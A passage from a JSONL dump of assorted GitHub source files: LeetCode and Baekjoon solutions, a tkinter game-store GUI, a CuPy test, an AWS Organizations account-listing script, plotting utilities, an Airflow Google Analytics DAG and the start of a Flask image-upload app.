10\n\n node.next = ListNode(total % 10)\n node = node.next\n\n l1 = l1.next\n l2 = l2.next\n\n tail = l1 or l2\n\n while tail:\n total = tail.val + carry\n carry = total // 10\n\n node.next = ListNode(total % 10)\n node = node.next\n\n tail = tail.next\n\n if carry:\n node.next = ListNode(carry)\n\n return head.next\n","repo_name":"pbelskiy/contest","sub_path":"leetcode.com/0002_add_two_numbers/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39077222708","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\nimport tkinter.font as font\r\nimport csv\r\n\r\n\r\n\r\ndef games_store():\r\n # создание окна выбора игр\r\n games = Toplevel(root)\r\n games.title(my_title)\r\n games.geometry(my_res)\r\n games.iconbitmap(my_icon)\r\n\r\n bg = PhotoImage(file='img/games.png')\r\n canvas1 = Canvas(games, width=1024, height=768)\r\n canvas1.grid(row=0, column=0)\r\n canvas1.create_image(0, 0, image=bg, anchor='nw')\r\n\r\n gameFrame = Frame(games)\r\n gameFrame.grid(row=0, column=0)\r\n\r\n # получение данных с csv файла\r\n filepath = 'csv/video_games.csv'\r\n\r\n File = open(filepath)\r\n Reader = csv.reader(File)\r\n Data = list(Reader)\r\n del (Data[0])\r\n\r\n list_of_entries = []\r\n for x in list(range(0, len(Data))):\r\n list_of_entries.append(Data[x][0])\r\n\r\n var = StringVar(value=list_of_entries)\r\n listbox1 = Listbox(gameFrame, listvariable=var, heigh=40, width=50)\r\n listbox1.grid(row=0, column=0, sticky='n')\r\n\r\n def update(): # функция для отоброжения конкретных данных с csv файла\r\n index = listbox1.curselection()[0]\r\n namelabel2.config(text=Data[index][0])\r\n genrelabel2.config(text=Data[index][5])\r\n publisherlabel2.config(text=Data[index][7])\r\n pricelabel2.config(text=Data[index][10])\r\n\r\n return None\r\n\r\n def buy():\r\n acc = Toplevel(root)\r\n acc.title(my_title)\r\n acc.geometry('640x480')\r\n acc.iconbitmap(my_icon)\r\n\r\n Label(acc, text='Войдите в аккаунт').pack()\r\n Label(acc, text='Логин ').pack()\r\n e = Entry(acc)\r\n e.pack()\r\n\r\n def add_user():\r\n File = open('users.csv', 'a', newline='')\r\n Writer = csv.writer(File)\r\n list_of_users = [e.get()]\r\n Writer.writerow(list_of_users)\r\n messagebox.showinfo(title='Покупка', message='Поздравляем, товар успешно куплен!')\r\n\r\n Button(acc, text='Войти', command=add_user).pack()\r\n\r\n # меню окна\r\n button1 = Button(gameFrame, text=\"Подробнее\", command=update).grid(row=5, column=1)\r\n button2 = Button(gameFrame, text='Купить', command=buy).grid(row=5, column=0)\r\n\r\n namelabel = Label(gameFrame, text=\"Название\")\r\n genrelabel = Label(gameFrame, text=\"Жанр\")\r\n publisherlabel = Label(gameFrame, text=\"Издатель\")\r\n pricelabel = Label(gameFrame, text=\"Цена (в $)\")\r\n\r\n a = 0\r\n for i in (namelabel, genrelabel, publisherlabel, pricelabel):\r\n i.grid(row=a + 1, column=0, sticky='w')\r\n a += 1\r\n\r\n namelabel2 = Label(gameFrame, text=\"\")\r\n genrelabel2 = Label(gameFrame, text=\"\")\r\n publisherlabel2 = Label(gameFrame, text=\"\")\r\n pricelabel2 = Label(gameFrame, text=\"\")\r\n\r\n x = 0\r\n for i in (namelabel2, genrelabel2, publisherlabel2, pricelabel2):\r\n i.grid(row=x+1, column=1, sticky='w')\r\n x += 1\r\n\r\n games.mainloop()\r\n\r\n\r\ndef my_games():\r\n lib = Toplevel(root)\r\n lib.title(my_title)\r\n lib.geometry('640x480')\r\n lib.iconbitmap(my_icon)\r\n\r\n Label(lib, text='Войдите в аккаунт').pack()\r\n Label(lib, text='Логин ').pack()\r\n e = Entry(lib)\r\n e.pack()\r\n\r\n def show_input():\r\n myLabel = Label(lib, text=e.get())\r\n myLabel.pack()\r\n\r\n Button(lib, text='Войти', command=show_input).pack()\r\n\r\n\r\ndef close():\r\n if messagebox.askyesno('Выход', 'Вы уверены?'):\r\n root.destroy()\r\n\r\n\r\n# var\r\nmy_title = 'MOBB'\r\nmy_res = '1024x768'\r\nmy_icon = 'img/mobb.ico'\r\nmy_spacebar = 50 * ' '\r\n\r\n# main (root) window creation\r\nroot = Tk()\r\nroot.title(my_title)\r\nroot.geometry(my_res)\r\nroot.iconbitmap(my_icon)\r\n\r\nbg = PhotoImage(file='img/bg.png')\r\ncanvas1 = Canvas(root, width=1024, height=768)\r\ncanvas1.grid(row=0, column=0)\r\ncanvas1.create_image(0, 0, image=bg, anchor='nw')\r\n\r\n# creation of the frames\r\nmyFrame = Frame(root)\r\nmyFrame.grid(row=0, column=0)\r\n\r\n\r\n# creation of the buttons\r\nmyFont = font.Font(family='Helvetica', size=15)\r\n\r\nmyButton1 = Button(myFrame, text='Выбрать игру', bg='#FFEB3B', padx=59, pady=30,\r\n command=games_store)\r\nmyButton1['font'] = myFont\r\nmyButton1.grid(row=0, column=0)\r\n\r\nmyButton2 = Button(myFrame, text=' Мои игры ', bg='#FFEB3B', padx=57, pady=30,\r\n command=my_games)\r\nmyButton2['font'] = myFont\r\nmyButton2.grid(row=1, column=0)\r\n\r\nmyButton3 = Button(myFrame, text=' Выход ', bg='#D32F2F', padx=49, pady=30,\r\n command=close)\r\nmyButton3['font'] = myFont\r\nmyButton3.grid(row=2, column=0)\r\nroot.mainloop()\r\n","repo_name":"nohararin19/mobb","sub_path":"Модуль 3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24420631213","text":"import string\n\nsrc_str = string.ascii_uppercase\ndst_str = src_str[3:]+src_str[:3]\nprint(dst_str)\nb = input(\"입력하세요:\") # 내가 D를 입력하면 3이 들어감\n\nfor ch in b:\n if ch in src_str:\n print(\"응맞아\")\n\n\n","repo_name":"badyong/pythonkpu","sub_path":"study13.py","file_name":"study13.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34152187851","text":"import ctypes\nimport cupy\n\ngmm_matrix_support = ctypes.cdll.LoadLibrary('./libgmm_matrix_support.so')\n# 设置参数类型\ngmm_matrix_support.dataCovariance.argtypes = [\n ctypes.POINTER(ctypes.c_double),\n ctypes.POINTER(ctypes.c_double),\n ctypes.c_int,\n ctypes.c_int\n]\n\ntestcase = cupy.random.randn(60000, 784) * 2.33 + 0.66\nanswer = cupy.cov(testcase, rowvar=False)\n\nxSubMu = testcase - testcase.mean(axis=0)\noutput = cupy.empty((784, 784), dtype=cupy.float64)\n\ngmm_matrix_support.dataCovariance(\n ctypes.cast(xSubMu.data.ptr, ctypes.POINTER(ctypes.c_double)),\n ctypes.cast(output.data.ptr, ctypes.POINTER(ctypes.c_double)),\n xSubMu.shape[0],\n xSubMu.shape[1]\n)\n\ndiff = cupy.abs(output - answer).max()\nif diff < 1e-8:\n print('test passed.')\nelse:\n print('test wrong! maximum difference: {:.6g}'.format(diff.item()))","repo_name":"jxzhn/gaussian-mixture","sub_path":"unit_test/dataCovariance.py","file_name":"dataCovariance.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27087351961","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n if not lists: return None\n interval = 1\n n = len(lists)\n while interval < n:\n for i in range(0, n-interval, 2*interval):\n lists[i] = self.merge2Lists(lists[i], lists[i+interval])\n interval *= 2\n return lists[0]\n\n def merge2Lists(self, a, b):\n snode = curr = ListNode()\n while a and b:\n if a.val < b.val:\n curr.next = a\n a = a.next\n else:\n curr.next = b\n b = b.next\n curr = curr.next\n if a:\n curr.next = a\n else:\n curr.next = b\n return snode.next\n","repo_name":"Mela2014/lc_punch","sub_path":"lc23_linkedlist.py","file_name":"lc23_linkedlist.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42464484224","text":"import os\nimport sys\nfrom csv import reader\n\nimport unittest\nfrom unittest.mock import patch\n\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nfrom metrics_data import risk_report\nfrom metrics_data.csv_extras import UnicodeDictReader\n\nclass RiskReportTest(unittest.TestCase):\n\n @patch('metrics_data.base_report.pd')\n def test_get_score_simple(self, mock_pd):\n with open('active_logo_growth.csv') as fd:\n for row in reader(fd):\n row = [int(risk_report.RiskReport._digitize_digit(i)) for i in row]\n score = risk_report.RiskReport.get_score_simple('active_logo_growth', row[0])\n assert score == row[1]\n\n with open('active_logos.csv') as fd:\n for row in reader(fd):\n row = [int(risk_report.RiskReport._digitize_digit(i)) for i in row]\n score = risk_report.RiskReport.get_score_simple('active_logos', row[0])\n assert score == row[1]\n\n @patch('metrics_data.base_report.pd')\n def test_get_score(self, mock_pd):\n with open('active_logos_x_growth.csv') as fd:\n first_row = None\n for row in reader(fd):\n if row[0] == '':\n first_row = row\n continue\n value = int(risk_report.RiskReport._digitize_digit(row[0]))\n for i in range(1, len(first_row)):\n col = int(risk_report.RiskReport._digitize_digit(first_row[i]))\n score = risk_report.RiskReport.get_score('active_logos_x_growth', value, col)\n cell = int(row[i])\n assert score == cell\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Zmeykoo/Metrics-Report","sub_path":"tests/test_risk_report.py","file_name":"test_risk_report.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72813001794","text":"# https://github.com/dannysteenman/aws-toolbox\n#\n# License: MIT\n#\n# This script returns a list of acounts that are part of an Organizational Unit (OU)\n\nimport boto3\nimport sys\n\n\ndef get_ou_for_account(account_id, root_id):\n response = organizations.list_parents(ChildId=account_id)\n parent_id = response[\"Parents\"][0][\"Id\"]\n\n if parent_id == root_id:\n return \"Root\"\n else:\n response = organizations.describe_organizational_unit(\n OrganizationalUnitId=parent_id\n )\n return response[\"OrganizationalUnit\"][\"Name\"]\n\n\n# Get the list of organizational unit names from the command-line arguments\nou_names = sys.argv[1:]\n\n# Create an AWS Organizations client\norganizations = boto3.client(\"organizations\")\n\n# Call the list_roots method to get a list of roots in the organization\nresponse = organizations.list_roots()\n\n# Get the ID of the root\nroot_id = response[\"Roots\"][0][\"Id\"]\n\nif not ou_names:\n # If no OU names are provided, list all accounts in the organization\n response = organizations.list_accounts()\n accounts = response[\"Accounts\"]\n print(\"Found the following accounts for the organization:\\n\")\n\n for account in accounts:\n ou_name = get_ou_for_account(account[\"Id\"], root_id)\n print(\n f'Account ID: {account[\"Id\"]}, Account Alias/Name: {account.get(\"Alias\", account[\"Name\"])}, Organizational Unit: {ou_name}'\n )\nelse:\n # Iterate through the list of OU names and get the ID of each OU\n ou_ids = []\n for ou_name in ou_names:\n # Call the list_organizational_units_for_parent method to get a list of organizational units for the root\n response = organizations.list_organizational_units_for_parent(ParentId=root_id)\n\n # Use a list comprehension to filter the results by name (case-insensitive) and get the ID of the first match\n ou_id = [\n ou[\"Id\"]\n for ou in response[\"OrganizationalUnits\"]\n if ou[\"Name\"].lower() == ou_name.lower()\n ][0]\n ou_ids.append(ou_id)\n\n # Call the list_accounts method for each parent ID (OU or root) to get a list of accounts\n accounts = []\n for parent_id in ou_ids:\n response = organizations.list_accounts_for_parent(ParentId=parent_id)\n accounts.extend(response[\"Accounts\"])\n\n print(f\"Found the following accounts for organizational units: {ou_names}\\n\")\n\n for account in accounts:\n print(\n f'Account ID: {account[\"Id\"]}, Account Alias/Name: {account.get(\"Alias\", account[\"Name\"])}'\n )\n","repo_name":"dannysteenman/aws-toolbox","sub_path":"organizations/list_accounts_by_ou.py","file_name":"list_accounts_by_ou.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":903,"dataset":"github-code","pt":"61"} +{"seq_id":"70040308355","text":"import os\nimport glob\nimport cv2\nimport sys\n\ndir_input = \"/home/leon/AI/EvaluationSetPro/face/reg/xiaomi_faces_from_1920_1080_margin_22/\"\ndir_output = \"/home/leon/AI/EvaluationSetPro/face/reg/xiaomi_faces_160_from_1920_1080_margin_22/\"\n\n\n\ndef create_image_list(dir_input):\n image_list = []\n\n # add sub dir\n img_dirs = os.listdir(dir_input)\n # print(img_dirs)\n for img_dir in img_dirs:\n imgs_list = glob.glob(os.path.join(os.path.join(dir_input,img_dir), \"*.jpg\"))\n image_list += imgs_list\n\n # add jpg file\n img_dirs = glob.glob(os.path.join(dir_input, \"*.jpg\"))\n image_list += img_dirs\n\n print(image_list)\n\n return image_list\n# print(image_list)\n# exit()\ndef image_resize(dir_output, image_list, image_size):\n for img_path in image_list:\n img = cv2.imread(img_path)\n img = cv2.resize(img, (image_size[0], image_size[1]))\n print(img_path.split(\"/\"))\n sub_dir = img_path.split(\"/\")[-2]\n full_dir = os.path.join(dir_output, sub_dir)\n if not os.path.exists(full_dir):\n os.makedirs(full_dir)\n cv2.imwrite(os.path.join(full_dir, os.path.basename(img_path)), img)\n\nif __name__ == '__main__':\n dir_input = sys.argv[1]\n dir_output = sys.argv[2]\n\n if not os.path.exists(dir_input):\n print(\"invalid input dir\")\n exit()\n\n if not os.path.exists(dir_output):\n os.makedirs(dir_output)\n\n image_list = create_image_list(dir_input)\n image_resize(dir_output, image_list, (640, 360))\n","repo_name":"fendaq/image_utils","sub_path":"image_resize.py","file_name":"image_resize.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18042926485","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nasm = 5980263\nc = 101898160\no3 = 21567776\n\ny = []\ny.append(asm)\ny.append(c)\ny.append(o3)\n\n\n\nind = np.arange(3) \nwidth = .75 \n\nfig, ax = plt.subplots()\nrects1 = ax.bar(ind, y, width)\n\nax.set_ylabel('Ciclos')\nax.set_title('Comparacion de cantidad de ciclos entre ASM y distintas optimizaciones de C')\n#plt.suptitle('de Rotar ASM y Rotar C', y=1.05, fontsize=17)\nax.set_xticks(ind + 0.4)\nax.set_xticklabels(('ASM','C','O3'))\nplt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))\nrects1[0].set_color('g')\nrects1[1].set_color('b')\nrects1[2].set_color('r')\nplt.ylim(0, 102500000)\n\nplt.show()\n\n","repo_name":"GregorioF/-Soplo-y-Soplo....-pero-su-Tp-aguanto-","sub_path":"Experimentos/COLORIZAR/ASMvsC.py","file_name":"ASMvsC.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6814850347","text":"\"\"\"\nMethod 2\n\n\"\"\"\n\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nl = list(map(int, input().split()))\ns = sorted(set(l))\nd = {s[i]:i for i in range(len(s))}\nfor i in l:\n print(d[i], end=' ')\n\n\"\"\"\nMethod 1\n시간 초과\n\"\"\"\n\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nl = list(map(int, input().split()))\ns = sorted(set(l))\nans = []\nfor i in range(len(l)):\n ans.append(s.index(l[i]))\nprint(*ans)","repo_name":"stellaluminary/Baekjoon","sub_path":"18870.py","file_name":"18870.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20127961498","text":"#!/usr/bin/env python\n# -*- animation -*-\n\"\"\"\nSolving The 2D Diffusion Equation\n\"\"\"\n\nimport numpy\nimport gr\nfrom numba.core.decorators import jit\n\ntry:\n from time import perf_counter\nexcept ImportError:\n from time import clock as perf_counter\n\ndx = 0.005\ndy = 0.005\na = 0.5\ndt = dx*dx*dy*dy/(2*a*(dx*dx+dy*dy))\ntimesteps = 150\n\nnx = int(1/dx)\nny = int(1/dy)\nui = numpy.zeros([nx,ny])\nu = numpy.zeros([nx,ny])\n\nfor i in range(nx):\n for j in range(ny):\n if ((i*dx-0.5)**2+(j*dy-0.5)**2 <= 0.1) and ((i*dx-0.5)**2+(j*dy-0.5)**2 >= 0.05):\n ui[i,j] = 1\n\n\ndef diff_step(u, ui):\n for i in range(1, nx-1):\n for j in range(1, ny-1):\n uxx = (ui[i+1,j] - 2*ui[i,j] + ui[i-1, j]) / (dx*dx)\n uyy = (ui[i,j+1] - 2*ui[i,j] + ui[i, j-1]) / (dy*dy)\n u[i,j] = ui[i,j]+dt*a*(uxx+uyy)\n\ndiff_step_numba = jit('void(f8[:,:], f8[:,:])')(diff_step)\n\nnow = perf_counter()\n\nt = 0\nworker = 'CPython'\n\nfor m in range(timesteps):\n gr.clearws()\n\n start = now\n if t > 5:\n diff_step_numba(u, ui)\n worker = 'Numba'\n else:\n diff_step(u, ui)\n ui = numpy.copy(u)\n now = perf_counter()\n t = t + now - start\n\n c = 1000 + 255 * u.ravel()\n gr.setviewport(0, 1, 0, 1)\n gr.setcolormap(-32)\n gr.cellarray(0, 1, 0, 1, nx, ny, c)\n gr.text(0.01, 0.95, '%10s: %7.2f fps' % (worker, 1.0 / (now - start)))\n gr.updatews()\n","repo_name":"sciapp/python-gr","sub_path":"examples/diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"61"} +{"seq_id":"23852756140","text":"from setuptools import setup, find_packages\n\nlong_description = \"Placeholder\"\n\nsetup(\n name = \"noteprompt\", # Replace with your own username\n version = \"1.0.0\",\n author = \"Aditya Pal\",\n author_email = \"adityapa.nghss@gmail.com\",\n description = \"A small CLI TODO app in Python\",\n long_description = long_description,\n long_description_content_type = \"text/markdown\",\n url = \"https://github.com/PalAditya/NotePrompt\",\n packages = find_packages(),\n install_requires = [\"plyer\", \"colored\", \"apscheduler\", \"pyautogui\", \"fpdf\"],\n classifiers = [\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n scripts=['src/cli.py']\n)","repo_name":"PalAditya/NotePrompt","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18739370109","text":"import time\nimport pathlib\nfrom glob import glob\n\nimport numpy as np\nimport healpy as hp\nimport matplotlib.pyplot as plt\nimport plotly.colors as pcol\nimport cosmoglobe\nfrom tqdm import tqdm \n\n\ndef get_gaussian_dist(x, mu=0, sigma=1):\n \"\"\"\n Method returns Gaussian distribution for given mu and sigma\n \"\"\"\n return np.exp((-(x-mu)**2)/(2*sigma**2)) / np.sqrt(2*np.pi*sigma**2) \n\ndef plot_component_maps(plots_dir, plot_fname, map_input, map_mu, \n map_rms, map_output, component=\"CMB\"):\n \"\"\"\n Method for plotting component maps. \n \"\"\"\n #m_matrix = np.array([input_map, mean_map, rms_map])\n map_tot = [map_input, map_mu, map_rms, map_output]\n idx = 1\n stokes_params = [\"I\", \"Q\", \"U\"]\n titles = [\n r\"$\\mathrm{Input}$\", \n r\"$\\mathrm{Mean}$\", \n r\"$\\mathrm{STD}$\", \n r\"$\\frac{\\mathrm{Mean - Input}}{\\mathrm{STD}}$\"\n ]\n for row, ti in enumerate(titles):#range(len(titles)):\n for col, sig in enumerate(stokes_params):#range(len(stokes_params)):\n sub = (len(titles), len(stokes_params), idx)\n # subplots(nrows, ncols, ...)\n cosmoglobe.plot(map_tot[row][col][:], \n llabel = sig, \n rlabel = ti, \n sub = sub, \n width = 12, \n unit = \"$\\mathrm{\\mu K_{CMB}}$\"\n )\n idx += 1\n plt.tight_layout()\n plt.savefig(plots_dir.joinpath(plot_fname).resolve())\n #plt.show()\n plt.close()\n\ndef plot_component_hists(plots_dir, plot_fname, map_output):\n \"\"\"\n Method for plotting component histograms.\n \"\"\"\n x = np.linspace(-5, 5, 10000)\n y = get_gaussian_dist(x, 0, 1)\n\n stokes_params = [\"I\", \"Q\", \"U\"]\n figure = plt.figure(figsize=(15,5))\n cols = len(stokes_params)\n ax = [1 for i in range(cols)]\n idx = 1\n for col in range(cols):\n ax[col] = figure.add_subplot(1, cols, idx)\n ax[col].set_title(f\"{stokes_params[col]}\")\n ax[col].hist(map_output[col], color=\"C10\", bins=100, range=(-6, 6),\n alpha=1, lw=0.1, \n density=True, rasterized=True)\n ax[col].plot(x,y, \"--\", alpha=0.8, color=\"C3\", \n rasterized=True, label=f\"$N(0,1)$\")\n idx += 1\n plt.savefig(plots_dir.joinpath(plot_fname).resolve())\n #plt.show()\n plt.close()\n","repo_name":"Cosmoglobe/Component-Separation-Course","sub_path":"sims_paper/pymods/plot_mod.py","file_name":"plot_mod.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"35042066686","text":"from datetime import datetime, timedelta\n\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\n\nfrom google_analytics_plugin.schemas.google_analytics_schemas import google_analytics_reporting_schema\nfrom airflow.operators import GoogleAnalyticsReportingToSqlOperator\n\nfrom conf import default_args\n\nGOOGLE_ANALYTICS_CONN_ID = 'ga_main'\n\n# Google Analytics has a \"lookback window\" that defaults to 30 days.\n# During this period, metrics are in flux as users return to the property\n# and complete various actions and conversion goals.\n# https://support.google.com/analytics/answer/1665189?hl=en\n\n# The period set as the LOOKBACK_WINDOW will be dropped and replaced during\n# each run of this workflow.\n\nLOOKBACK_WINDOW = 30\n\n# NOTE: While GA supports relative input dates, it is not advisable to use\n# these in case older workflows need to be re-run.\n\n# https://developers.google.com/analytics/devguides/reporting/core/v4/basics\nSINCE = \"{{{{ macros.ds_add(ds, -{0}) }}}}\".format(str(LOOKBACK_WINDOW))\nUNTIL = \"{{ ds }}\"\n\nview_ids = [106710411,\n 178683781,\n 226956185,\n 214892222,\n 224195176,\n 171699580]\n\n# https://developers.google.com/analytics/devguides/reporting/core/v3/reference#sampling\nSAMPLING_LEVEL = None\n\n# https://developers.google.com/analytics/devguides/reporting/core/v3/reference#includeEmptyRows\nINCLUDE_EMPTY_ROWS = False\n\nPAGE_SIZE = 1000\n\n# NOTE: Not all metrics and dimensions are available together. It is\n# advisable to test with the GA explorer before deploying.\n# https://developers.google.com/analytics/devguides/reporting/core/dimsmets\n\nMETRICS = [{'expression': 'ga:pageViews'},\n {'expression': 'ga:bounces'},\n {'expression': 'ga:users'},\n {'expression': 'ga:newUsers'},\n {'expression': 'ga:adClicks'},\n {'expression': 'ga:CPM'},\n {'expression': 'ga:CPC'},\n {'expression': 'ga:CTR'},\n {'expression': 'ga:avgSessionDuration'}]\n\n\nDIMENSIONS = [{'name': 'ga:date'},\n {'name': 'ga:hour'},\n {'name': 'ga:keyword'},\n {'name': 'ga:referralPath'},\n {'name': 'ga:campaign'},\n {'name': 'ga:sourceMedium'},\n {'name': 'ga:deviceCategory'}]\n\n# The specified TIMEFORMAT is based on the ga:dateHourMinute dimension.\n# If using ga:date or ga:dateHour, this format will need to adjust accordingly.\nCOPY_PARAMS = [\"COMPUPDATE OFF\",\n \"STATUPDATE OFF\",\n \"JSON 'auto'\",\n \"TIMEFORMAT 'YYYYMMDDHHMI'\"\n \"TRUNCATECOLUMNS\",\n \"region as 'us-east-1'\"]\n\n# Primary and Incremental Keys are set to same value as no other reliable\n# primary_key can found. This will result in all records with matching values of\n# dateHourMinute to be deleted and new records inserted for the period of time\n# covered by the lookback window. Timestamps matching records greater than\n# the lookback window from the current data will not be pulled again and\n# therefore not replaced.\n\nPRIMARY_KEY = 'datehourminute'\nINCREMENTAL_KEY = 'datehourminute'\n\ndefault_args['retries'] = 2,\ndefault_args['retry_delay'] = timedelta(minutes=5)\n\ndag_params = {\n 'dag_id': f'{GOOGLE_ANALYTICS_CONN_ID}_to_postgres_hourly',\n 'default_args': default_args,\n 'start_date': datetime(2020, 10, 1, 8, 0, 0),\n 'catchup': False,\n 'schedule_interval': '@hourly'\n}\n\nwith DAG(**dag_params) as dag:\n start = DummyOperator(task_id='start')\n end = DummyOperator(task_id='end')\n\n for view_id in view_ids:\n\n view_id = str(view_id)\n extract_ga = GoogleAnalyticsReportingToSqlOperator(task_id=f'etl_{view_id}',\n google_analytics_conn_id=GOOGLE_ANALYTICS_CONN_ID,\n view_id=view_id,\n since=SINCE,\n until=UNTIL,\n sampling_level=SAMPLING_LEVEL,\n dimensions=DIMENSIONS,\n metrics=METRICS,\n page_size=PAGE_SIZE,\n include_empty_rows=INCLUDE_EMPTY_ROWS,\n db_conn_id='postgres_prod',\n db_table='w0_external.google_analytics'\n )\n\n start >> extract_ga\n extract_ga >> end","repo_name":"lyeith/pygadgets-core","sub_path":"pygadgets/airflow_util/dags/ga_to_postgres.py","file_name":"ga_to_postgres.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72963626433","text":"\"\"\"\n绘图工具类\n\"\"\"\nfrom typing import List, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass Plot3:\n INIT: bool = False\n ax = None\n\n @staticmethod\n def __init():\n plt.rcParams['font.sans-serif'] = ['SimHei'] # 用来正常显示中文标签\n plt.rcParams['axes.unicode_minus'] = False # 用来正常显示负号\n\n fig = plt.figure()\n Plot3.ax = fig.gca(projection='3d')\n Plot3.ax.grid(False)\n\n Plot3.INIT = True\n\n @staticmethod\n def plot3d(lines: List[Tuple[np.ndarray, str]]) -> None:\n if not Plot3.INIT:\n Plot3.__init()\n\n for lc in lines:\n x = lc[0][:, 0]\n y = lc[0][:, 1]\n z = lc[0][:, 2]\n Plot3.ax.plot(x, y, z, lc[1])\n\n @staticmethod\n def show():\n if not Plot3.INIT:\n raise RuntimeError(\"Plot3::请在show前调用plot3d\")\n\n plt.show()\n\n\nclass Plot2:\n INIT = False\n\n @staticmethod\n def __init():\n plt.rcParams['font.sans-serif'] = ['SimHei'] # 用来正常显示中文标签\n plt.rcParams['axes.unicode_minus'] = False # 用来正常显示负号\n\n Plot2.INIT = True\n\n @staticmethod\n def plot2d(lines: List[Tuple[np.ndarray, str]]) -> None:\n if not Plot2.INIT:\n Plot2.__init()\n\n for lc in lines:\n x = lc[0][:, 0]\n y = lc[0][:, 1]\n plt.plot(x, y, lc[1])\n\n @staticmethod\n def plot2d_xy(x: np.ndarray, y: np.ndarray, describe='r') -> None:\n if not Plot2.INIT:\n Plot2.__init()\n\n plt.plot(x, y, describe)\n\n @staticmethod\n def show():\n if not Plot2.INIT:\n raise RuntimeError(\"Plot3::请在show前调用plot3d\")\n\n plt.show()\n","repo_name":"madokast/cctpy","sub_path":"codes/cctpy/plotuils.py","file_name":"plotuils.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"22638920606","text":"\r\nclass Adjacency(): #Lists all rooms and which rooms they're adjacent to.\r\n def __init__(self):\r\n self.__attic = (\"atticStair\", \"hallway\")\r\n self.__atticStair = (\"attic\", \"floor2Hall\", \"hallway\")\r\n ####\r\n self.__upstairs = (\"bathroom\", \"storage\", \"bedroom\",\r\n \"attic\", \"closet\", \"lobby\")\r\n self.__bathroom = \"hallway\"\r\n self.__masterBedroom = \"hallway\"\r\n self.__storage = \"hallway\"\r\n self.__bedroom = \"hallway\"\r\n self.__floor2Stair = (\"upstairs\", \"hallway\", \"lobby\")\r\n ####\r\n self.__lobby = (\"upstairs\", \"diningroom\", \"den\", \"dining room\")\r\n self.__den = (\"garage\", \"kitchen\", \"lobby\")\r\n self.__garage = (\"den\")\r\n self.__diningroom = (\"kitchen\", \"lobby\", \"basement\")\r\n self.__kitchen = (\"diningroom\", \"den\", \"dining room\")\r\n ###\r\n self.__dictionary = {\"attic\":self.__attic,\r\n \"atticStair\":self.__atticStair, \"upstairs\":self.__upstairs,\r\n \"hallway\":self.__upstairs,\r\n \"bathroom\":self.__bathroom,\r\n \"storage\":self.__storage, \"closet\":self.__storage,\r\n \"bedroom\":self.__bedroom,\r\n \"floor2Stair\":self.__floor2Stair, \"lobby\":self.__lobby,\r\n \"den\":self.__den, \"garage\":self.__garage,\r\n \"diningroom\":self.__diningroom, \"dining room\":self.__diningroom,\r\n \"kitchen\":self.__kitchen}\r\n\r\n def getDict(self):\r\n return(self.__dictionary)\r\n","repo_name":"danielslee97/Chronophobia","sub_path":"Adjacency.py","file_name":"Adjacency.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3536980305","text":"import os\n\nimport numpy as np\nfrom flask import Flask, render_template, request, send_from_directory\nfrom keras.layers import Conv2D, Dense, Flatten, Dropout\nfrom keras.models import Sequential\nfrom keras.optimizers import SGD\nfrom keras.preprocessing import image\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow import keras\n\napp = Flask(__name__)\n\nif __name__ == '__main__':\n app.run()\n\n\n@app.route('/icons/')\ndef getUrl(filename):\n return send_from_directory(\n os.path.join(\n \"E:/projects/comvistugas2/templates/icons\"\n ), filename\n )\n\n\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route('/upload-image', methods=[\"GET\", \"POST\"])\ndef upload():\n ROOT_PATH = 